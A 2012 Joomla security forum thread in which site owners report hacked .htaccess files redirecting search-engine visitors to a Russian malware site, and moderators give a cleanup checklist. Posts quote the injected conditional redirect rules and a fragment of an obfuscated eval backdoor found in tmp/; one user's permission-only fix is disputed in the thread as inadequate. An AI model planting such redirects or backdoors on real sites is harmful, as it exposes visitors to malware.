Joomla .htaccess hacked to xxx.ru

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
johnb18919
Joomla! Apprentice
Joomla! Apprentice
Posts: 21
Joined: Fri Mar 23, 2012 10:31 am

Re: Joomla .htaccess hacked

Post by johnb18919 » Sat Mar 24, 2012 1:18 pm

Can you explain, I do not understand the ISP cache or city location.

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 43979
Joined: Sat Apr 05, 2008 9:58 pm

Re: Joomla .htaccess hacked

Post by Webdongle » Sat Mar 24, 2012 2:01 pm

shaunoff wrote:Hi, I have checked my laptops for malware with a couple of programs but... if that was the issue then it wouldnt affect my mac, my windows laptop, my iphone, my ipad and my mates nokia.
...
But an infected computer with ftp access is one possible way(of many) the exploit got on your server.

shaunoff wrote:I cant work on the site from my office or from home though
Why not ? You still have the database and ftp access yes ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Joomla .htaccess hacked

Post by PhilD » Sat Mar 24, 2012 3:57 pm

Couple things. If you still have the database then you can manually copy the Joomla files back. Use the same version that you were on before you attempted to fix things. If you don't have a copy of the configuration.php file we can help get that back by telling you what to edit manually to create one.
Once the basic site is back, you can update to the latest version then go from there.

Have you checked what nameservers are attached to your domain name and are they correct?

I would think about switching hosts if they are being unhelpful and you were not able to make backups of your site because or them. Backups of any site is very important.
PhilD

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: .htaccess Redirect Hack

Post by PhilD » Sat Mar 24, 2012 5:13 pm

It does not have to be an htaccess redirect hack or even a server hack.

This (redirect) can be performed by a specific bit of code dropped into a file on your site usually in the form of obfuscated code. This file it is inserted within could be your templates index.php file, an html file, javascript file or a php file different from the index file already mentioned. Done properly this code is usually a conditional redirect so only people reaching the site from a specific path (google,yahoo, facebook, etc. and so on) and using a specific selection of browsers (user agents), get the redirect to a bad (malware, spam etc.) site. Anyone not meeting the requirements gets a normal page without a redirect to somewhere else. This makes it a bit harder to discover and thus the code gets to serve it's redirects longer. Done improperly, everyone gets the redirect and it is easily discovered.

Though there are other methods that can be employed, the code (as with any other type of malware hack) normally gets onto a site by an insecure extension or by using out of date (and thus insecure) core software.

Because this code can be within almost any file within a site and it is recommended that one follow the points below. Only by doing this can one be assured the code is truly removed form the site.

[ ] Run the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Select the checkboxes for Show Components, Show Modules, Show Plugins before generating the forum code.

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file. Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory), and fresh copies of extensions and templates used. Upload the copy of your configuration file. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories More detail can be found in the security Checklist 7 link below.

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist 7 to make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled

Note: The forum post tool will work with 1.0.x, J1.6.x, J1.7.x, 2.5.x versions of Joomla.
PhilD

Ciohap22
Joomla! Apprentice
Joomla! Apprentice
Posts: 8
Joined: Sun Oct 16, 2011 6:49 am

htacess hacked redirect to russian site

Post by Ciohap22 » Mon Mar 26, 2012 5:41 pm

Hi,

I have a few sites (3 joomla, 1 mambo, 2 forums) and i have a strange problem.
Suddenly all of my .htacess files have this code:

Code: Select all

<IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|[youtube]|<trim>|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
 RewriteRule ^(.*)$ http://<malicious url>.ru/gluce/index.php [R=301,L]
 </IfModule>
and a few pages of my sites (not all of them, just those that are well positioned in google searches) are redirected to a russian site.

I deleted the files several times and the code reapeares.
I`ve asked the host if the problem occurs in every account hosted on that server (it is a shared account) and they`ve told me that the problem is on my account (i don`t know if i can trust this answer). They even changed the .htacess permissions to 444 and the files is still changing every time.

Any idea on how should i handle this thing?
Last edited by mandville on Mon Mar 26, 2012 5:54 pm, edited 1 time in total.
Reason: trimmed code, removed link

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15149
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htacess hacked redirect to russian site

Post by mandville » Mon Mar 26, 2012 5:55 pm

beyond following the instructions in this post http://forum.joomla.org/viewtopic.php?f=432&t=475313
have you looked at the other topics in this forum?
Moderators comment: we can not provide support for other peoples forum and cms scripts eg mambo
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Ciohap22
Joomla! Apprentice
Joomla! Apprentice
Posts: 8
Joined: Sun Oct 16, 2011 6:49 am

Re: htacess hacked redirect to russian site

Post by Ciohap22 » Mon Mar 26, 2012 6:01 pm

Moderators comment: we can not provide support for other peoples forum and cms scripts eg mambo
How about providing support for joomla instead.

The version is 1.5.22

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15149
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htacess hacked redirect to russian site

Post by mandville » Mon Mar 26, 2012 7:10 pm

Ciohap22 wrote:How about providing support for joomla instead.
thats what we are here for, and as stated in the post, http://forum.joomla.org/viewtopic.php?f=432&t=475313 run that, and read the other htaccess hacked posts for anything familiar
The version is 1.5.22
which means you are using a vulnerable version of joomla.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

ondi
Joomla! Apprentice
Joomla! Apprentice
Posts: 43
Joined: Mon Feb 18, 2008 3:49 pm

Re: htacess hacked redirect to russian site

Post by ondi » Wed Mar 28, 2012 6:49 am

I am using the latest Joomla version (1.5.26), and am also getting this problem.

I keep deleting the code from .htaccess but it keeps reappearing. I have tried changing passwords, but this does not work either.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: htacess hacked redirect to russian site

Post by PhilD » Wed Mar 28, 2012 12:35 pm

This is from the link mandville posted

Tell us if you have done the following, try copy and paste to use as a posting guide if needed

[ ] Did you use the forum http://forum.joomla.org/search.php search box for a similar htaccess hacked issue? There may be info to help you in one of those posts.

[ ] Run the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Check the check boxes for Show Components, Show Modules, and Show Plugins before generating the forum post code. Post the generated code so we can check your environment.

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file. Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory), and fresh copies of extensions and templates used. Upload the copy of your configuration file. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories More detail can be found in the security Checklist 7 link below.

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist 7 to make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled

Note: The forum post tool will work with 1.0.x, J1.6.x, J1.7.x, 2.5.x versions of Joomla.
PhilD

User avatar
Troll
Joomla! Intern
Joomla! Intern
Posts: 71
Joined: Sun Sep 04, 2005 3:36 pm

Re: htacess hacked redirect to russian site

Post by Troll » Wed Mar 28, 2012 1:11 pm

Hi

I also have/had this problem today.

I'm not sure at this time, but after I deleted all files in /tmp where I had one file named jos_core.php.

This file I have seen mentioned a couple of times regarding this problem.

Since deleting this file and restored httaccess file from remote backup the domain I have had problems with have been fine, no new "infections" for a couple of hours now.

Hope this helps, and please report back if this also helped you so we can help others.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: htacess hacked redirect to russian site

Post by PhilD » Wed Mar 28, 2012 6:03 pm

In order to better help, pepole jumping on the OP's topic should think about starting their own.

Everyone including the me too's should follow what I and mandville posted above. almost Any hack of your website can be solved by following the posted information. This includes non Joomla websites and programs.
PhilD

IamSandman
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Mon Jan 16, 2012 12:38 am

Re: Joomla .htaccess hacked

Post by IamSandman » Thu Mar 29, 2012 10:04 pm

I just want to say that I too had code mysteriously appear in more than one .htaccess file on my server (Godaddy Shared)... What I believe this is: a bot that searches the root of tons of websites for an .htaccess file with permissions set incorrectly. As long as you can reset the permissions to 444 (only read for owner,group & public) It should remain unchanged in the future. - I deleted the ones with the malicious conditional redirect code and replaced them with backups but set the permissions to 444 immediately. - This cured the redirect from search engine urls that they had placed in my .htaccess....

Code: Select all

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo||web-archiv)\.(.*)

RewriteRule ^(.*)$ http://deleted.ru/example/status.php [R=301,L]	

RewriteCond %{HTTP_REFERER} ^.*(web||botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)

RewriteRule ^(.*)$ http://deleted.ru/example/status.php [R=301,L]	</IfModule>
You can scan your site after you make the corrections here: sucuri.net - click the link for CMS's Wordpress, Joomla etc. - This caches the results for 24 hrs. or more so re-scanning will not tell you if you fixed it or not.

Try http://www.siteadvisor.com/ -Use the little form on the right hand side labeled "View a Site Report" to check if you have malware...

Or you can try: http://safeweb.norton.com/

P.S. On GoDaddy, in hosting control panel under "FTP File Manager" there is a setting for "History" you can use the calendar to set the date and select the files/directories you want to restore to that date and this can help if you cant find the culprit... I set mine to yesterday and the .htaccess files came back with permissions 604 but no code so the backups must have been done before the code was stuck in there... meaning simply setting the permissions correctly (444) again seems to stop the problems entirely. (I could find no malicious code in databases at all so I think this fixed the redirect)
Last edited by mandville on Thu Mar 29, 2012 10:19 pm, edited 1 time in total.
Reason: trimmed code, removed link

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 43979
Joined: Sat Apr 05, 2008 9:58 pm

Re: Joomla .htaccess hacked

Post by Webdongle » Thu Mar 29, 2012 10:09 pm

IamSandman wrote:I deleted the ones with the malicious conditional redirect code and replaced them with backups but set the permissions to 444 immediately. - This cured the redirect from search engine urls
Unless other unwanted files have been put on your server :eek:
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15149
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked

Post by mandville » Thu Mar 29, 2012 10:28 pm

I must take issue with your "recommendations" on solving the hacked site
As long as you can reset the permissions to 444 (only read for owner,group & public) It should remain unchanged in the future.
so what permissions were they in the first place? your htaccess is normally 644 anyway, so the person who had root access to your joomla wrote it without worrying what permissions it had. .

As webdongle points out, you dont know what else was put on the site or even how it was hacked in the first place
if you had searched or read other posts you will have seen the that suggestions such as this do not work with sorting the reasons first, or locating the shell script that was installed.
Many experienced users have compiled the list of how to and guides for resolving hacking issues.

Checklist 7 is the page you want that is linked in the checklist below from the sticky post "before you post read this".
As you apparently have been hacked, then would you post your extended fpa output so we can attempt to see why?



[ ] Run the Forum Post Assistant / FPA Instructions available here and are also included in the download package.

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation. Replace the deleted files with fresh copies of a current full version of Joomla, and fresh copies of extensions and templates used. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist checklist 7 to make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 43979
Joined: Sat Apr 05, 2008 9:58 pm

Re: Joomla .htaccess hacked

Post by Webdongle » Thu Mar 29, 2012 10:36 pm

mandville wrote:I must take issue with your "recommendations" on solving the hacked site...
+1 mandvile for that and the rest of the post. There are far too many posting they fixed the issue and misleading others. mandville has put a lot of time and effort into creating a method to recover/rebuild a hacked site. Those who do not follow that guide will inevitably be hacked again. Or be an unknowing carrier of spam.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15149
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked

Post by mandville » Thu Mar 29, 2012 10:55 pm

Webdongle wrote: mandville has put a lot of time and effort into creating a method to recover/rebuild a hacked site.
others were involved, phild and i just compiled it.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

IamSandman
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Mon Jan 16, 2012 12:38 am

Re: Joomla .htaccess hacked

Post by IamSandman » Fri Mar 30, 2012 1:11 am

I am not very good at asking for help. I was merely trying to explain what happened to me and how I got a site to be accessible from search engine referring urls (90% of our traffic comes from one of the conditional rewrites that had been added to my .htaccess.) This means that our clients (new & returning) were being redirected to a site serving up malware (Windows Antivirus 2012) - I got my sites live again and so far it's business as usual. (I have about 8 sites in this account 5 have SSL and only the 2 sites with .htaccess files I edited last night were affected?

You see, I had just last evening put a new .htaccess in my hosting root (Joomla site#1) and edited the .htaccess in a folder inside of another hosted site in same account (Joomla site #2) -
Then today, when I discovered the referring links (serps/facebook/twitter etc.) were
redirecting to this .ru malware site,
After discovering the code, I checked permissions on these two files found that only these two files were 604 and so I swapped them out with new untainted ones and set permissions to 444.

Then I deleted the .htaccess from my hosting root (Joomla site#1) and then used GoDaddy's control panel to do a complete file restore on every file/folder in my enitre account (to the date of yesterday) from Godaddy's backups, and voila' the .htaccess without the malicious code and the old permissions re-appeared.
I again reset permissions to 444 and I can't see anything in PHPMyAdmin - you see on sucuri.net it was reporting that malicious code was found in http:// [your-site] .com/ (*no spaces*) 404javascript.js - This file does not exist. nor can I find any reference to it in my database (I searched for 404 across the entire db) - See this (cache for 24 hrs) http://sitecheck.sucuri.net/results/http:// [your-site] .com

And here is my FPA Post
Forum Post Assistant (v1.2.0) : 29th March 2012 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 1.5.15-Stable (Wojmamni Ama Mamni) 05-November-2009
Joomla! Configured :: Yes | Read-Only (444) | Owner: 5471306 (uid: /gid: ) | Group: 450 (gid: ) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 1 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-238.19.1.el5PAE | Technology: i686 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /var/chroot/home/content/d/f/a/dfarinha/html | System TMP Writable: No

PHP Configuration :: Version: 5.2.14 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 32M | Max. POST Size: 33M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 64M

MySQL Configuration :: Version: 5.0.92-log (Client:5.0.77) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 1.78 MiB | #of _FPA_TABLE: 83
Detailed Environment :: wrote:PHP Extensions :: date (5.2.14) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dba () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | gettext () | session () | iconv () | json (1.2.1) | mbstring () | mcrypt () | mhash () | mysql (1.0) | SimpleXML (0.1) | SPL (0.2) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | pspell () | Reflection (0.1) | standard (5.2.14) | mysqli (0.1) | soap () | SQLite (2.0-dev) | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | zip (1.8.11) | cgi-fcgi () | Zend Engine (2.2.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Templates Discovered :: wrote:Templates :: SITE :: yoo_planet (1.5.0) | rhuk_milkyway (1.0.2) | JA_Purity (1.2.0) | beez (1.0.0) |
Templates :: ADMIN :: Stainless (0.3.5) | Khepri (1.0) |
I understand what you are saying and I will try to follow the instructions you have given me but until I see evidence of an injection or any strange files or my site(s) or .htaccess gets re-written again - I don't want to upgrade Joomla and risk the crazy modifications I have made over the years without any training to break my entire site..... I am not tying to offer recommendations to anyone rather explain what happened to me as best I can and see if it leads to any advice...... or helps anyone else.... I thank you for your responses to my crazy post. I am a scatterbrained kinda dude.... HELLLLP (& Thank you)
Last edited by ooffick on Tue Aug 21, 2012 8:05 am, edited 1 time in total.
Reason: Mod Note: Removed link to own site as requested by the user

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 43979
Joined: Sat Apr 05, 2008 9:58 pm

Re: Joomla .htaccess hacked

Post by Webdongle » Fri Mar 30, 2012 1:40 am

IamSandman wrote:you see on sucuri.net it was reporting that malicious code was found in http:// [your-site] .com/ (*no spaces*) 404javascript.js - This file does not exist.
The file 404javascript.js pretends to throw a 404 error.
Capture 130.PNG
Generated source code
Capture 131.PNG
Your site is still infected !!!
You do not have the required permissions to view the files attached to this post.
Last edited by ooffick on Tue Aug 21, 2012 8:06 am, edited 1 time in total.
Reason: Mod Note: Removed his URL.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15149
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked

Post by mandville » Fri Mar 30, 2012 1:59 am

IamSandman wrote:I don't want to upgrade Joomla and risk the crazy modifications I have made over the years without any training to break my entire site.....

and after seeing your fpa output
Forum Post Assistant (v1.2.0) : 29th March 2012 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 1.5.15-Stable (Wojmamni Ama Mamni) 05-November-2009
I will say either you update the core files that need updating to the latest secure version of joomla or we will be very reluctant to help you as everything we suggest to sticky plaster your site will be in vain
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

IamSandman
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Mon Jan 16, 2012 12:38 am

Re: Joomla .htaccess hacked

Post by IamSandman » Fri Mar 30, 2012 2:15 am

Webdongle wrote: The file 404javascript.js pretends to throw a 404 error.
Your site is still infected !!!
No, I am afraid that is SmartOptimizer throwing that error... I just uploaded a blank 404javascript.js that contained a silly sentence, removed the "SmartOptimizer code from my .htaccess and you can call it just fine I saw the sentence in the file.
The results from sucuri.net i linked to are cached results.

When I removed that smart optimizer code and uploaded new .htaccess, I renamed the phoney 404javascript.js to 1404javascript.js and went to the url including 404javascript.js and it redirected to the russian malware site.... (so site is still infected)
when I upload a blank 404javascript.js file no redirect / not from that file or from search engine referrers... the .htaccess is not being written to,
I hope I am making sense... If I remove that blank 404javascript.js file and you go to that url, you will be redirected to malware... but no redirect in .htaccess because I have a blank version of that file in site root it loads it instead of redirecting....

I wish I knew where the code was injected -On the vulnerable checklist I found that I have RSMonials a known vulnerable and I also had akeeba which I removed.... - I am afraid to upgrade, removing rsmonials will hurt me in search rankings because of all the content lost- I guess I could buy Jreviews....
P.S. this malware site tries to give you a file, after cancel it gives you the "leave page" "stay on page" dialogue, and you can exit out if you are careful....

After reading that last post by mandville - I am trying to get the nerve to just try to upgrade, can I just follow instructions on exactly how to do it? Where should I begin? Sorry if I am asking questions that could be answered with a simple search.. I am not wanting to be a pain..... I just need a little guidance...

Is jUpgrade doable?
-

johnb18919
Joomla! Apprentice
Joomla! Apprentice
Posts: 21
Joined: Fri Mar 23, 2012 10:31 am

Re: Joomla .htaccess hacked

Post by johnb18919 » Fri Mar 30, 2012 2:26 am

I will share this. I had the same problem, and appears we are using the same type of GoDaddy account.
1. The hacker got into one of my dormant domains, that I should have removed.
2. Once in, replaced my .htaccess files. The crazy part is that when I started I was using simple FTP. Utilizing FTP with GoDaddy you cannot see the .htaccess file for the root html folder, That was re-directing any errors to the primary and alias domains to the malicious site. Only when I changed to SSH was it visible.
3. Do not believe any of the databases were compromised but all files in all joomla/wordpress domains had to be replaced as any compromise leaves everything suspect.

I have not had any issues since this past Sunday.

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 43979
Joined: Sat Apr 05, 2008 9:58 pm

Re: Joomla .htaccess hacked

Post by Webdongle » Fri Mar 30, 2012 10:22 am

IamSandman wrote:I wish I knew where the code was injected
That says it all because you don't know. Your site could be compromised in many directories and you don't know!. Until you delete all the folders/files on your server and replace with the latest version of Joomla (and only use the newest versions of extensions not on the VEL) ... and everything else on the list ... you can not be sure of removing the exploit.

mandville wrote:I will say either you update the core files that need updating to the latest secure version of joomla or we will be very reluctant to help you as everything we suggest to sticky plaster your site will be in vain
Yes, I agree 100%
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
Okie
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 103
Joined: Fri Apr 21, 2006 10:20 am
Location: Jakarta

Re: Joomla .htaccess hacked

Post by Okie » Sat Mar 31, 2012 4:25 am

Webdongle wrote:
IamSandman wrote:I wish I knew where the code was injected
That says it all because you don't know. Your site could be compromised in many directories and you don't know!. Until you delete all the folders/files on your server and replace with the latest version of Joomla (and only use the newest versions of extensions not on the VEL) ... and everything else on the list ... you can not be sure of removing the exploit.
Cmiw, sometimes they even put the infected .htaccess above the public_html.

User avatar
Bernard T
Joomla! Guru
Joomla! Guru
Posts: 782
Joined: Thu Jun 29, 2006 11:44 am
Location: Hrvatska
Contact:

Re: Joomla .htaccess hacked

Post by Bernard T » Sat Mar 31, 2012 8:44 am

I was just yesterday cleaning up the same issue like this one.

The source of it was "local file injection" of a .php script inserted into tmp/ folder in webroot. The php script has a Base64 encoded and packed code inside that gives the attacker access to your whole homedir and can do virtually anything!!

Detection:
Please take a look into tmp/ folder and find any .php files (here they were named "_cache_XYZ...php" in my case, but the name shouldn't really matter). You will notice code like this:

Code: Select all

... preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67 ...
. Simply delete file(s)!

Source:
The weak extension I found that was used to inject files was an old version of "Advanced Module Manager" based on know vulnerable "NoNumber Framework"... so if you have extensions based on NoNumber framework, upgrade or uninstall them...

I can try to take some time and write script to search for those files if needed.
VEL Team || Security Forum || PHP/Web Security Specialist || OWASP member
JAMSS author http://forum.joomla.org/viewtopic.php?f=621&t=777957
Twitter: @toplak

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15149
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked

Post by mandville » Sat Mar 31, 2012 8:49 am

btoplak wrote:I can try to take some time and write script to search for those files if needed.
thaks for the offer,
not every site we have looked at has that extension, also it is not server specific, nor joomla specific
the malicious cron file has had various name but is most commonly called "jos_core" or "joom_core"
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Bernard T
Joomla! Guru
Joomla! Guru
Posts: 782
Joined: Thu Jun 29, 2006 11:44 am
Location: Hrvatska
Contact:

Re: Joomla .htaccess hacked

Post by Bernard T » Sat Mar 31, 2012 9:37 am

mandville wrote: not every site we have looked at has that extension, also it is not server specific, nor joomla specific
the malicious cron file has had various name but is most commonly called "jos_core" or "joom_core"
Exactly, the issue is widespread last few days, I found that many Wordpress sites are also infected with such scam, and reports say mostly it's some LSI vulnerable extension/plugin that has been used.

I also saw jos_core.php in access logs, but file was gone... are the files regularly in WEBROOT/tmp folder ?

In our case there wasn't any cronjob, at least not on the account-level, it wasn't on our servers (external client) so we can't be sure for the rest of server though...

I'll patch up some scanning script later today
VEL Team || Security Forum || PHP/Web Security Specialist || OWASP member
JAMSS author http://forum.joomla.org/viewtopic.php?f=621&t=777957
Twitter: @toplak

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15149
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla .htaccess hacked

Post by mandville » Sat Mar 31, 2012 10:20 am

yes, most of them are in the tmp folder..
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

IamSandman
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Mon Jan 16, 2012 12:38 am

Re: Joomla .htaccess hacked

Post by IamSandman » Sat Mar 31, 2012 11:23 am

BernardT wrote:look into tmp/ folder and find any .php files (here they were named "_cache_XYZ...php"
I had this exact file - (mine was named "_cache_tb4cgodq.php").
I uploaded a blank dummy file named 404javascript.js to root of each infected site which seemed to stop the redirect from occurring.

I deleted the _cache_tb4cgodq.php in the tmp folder and renamed 404javascript.js to something else and called my site address + /404javascript.js and the redirect occurs again, (The .ru site is down.....) anyway, I renamed 404javascript.js back to that and left it alone... I have to go do the work that this site produces and it being live and not serving malware is most important. Is there anything that can be done to prevent hackers from doing this type of "local file injection"?

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 43979
Joined: Sat Apr 05, 2008 9:58 pm

Re: Joomla .htaccess hacked

Post by Webdongle » Sat Mar 31, 2012 12:09 pm

IamSandman wrote:...
I had this exact file - (mine was named "_cache_tb4cgodq.php").
I uploaded a blank dummy file named 404javascript.js to root of each infected site which seemed to stop the redirect from occurring.
...
I would like to take this opportunity to remind you that your site is still infected. And by not deleting all the files and replacing them with updated ones ... that you risk infecting the Browsers of visitors to your site.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".


Locked

Return to “Security in Joomla! 1.5”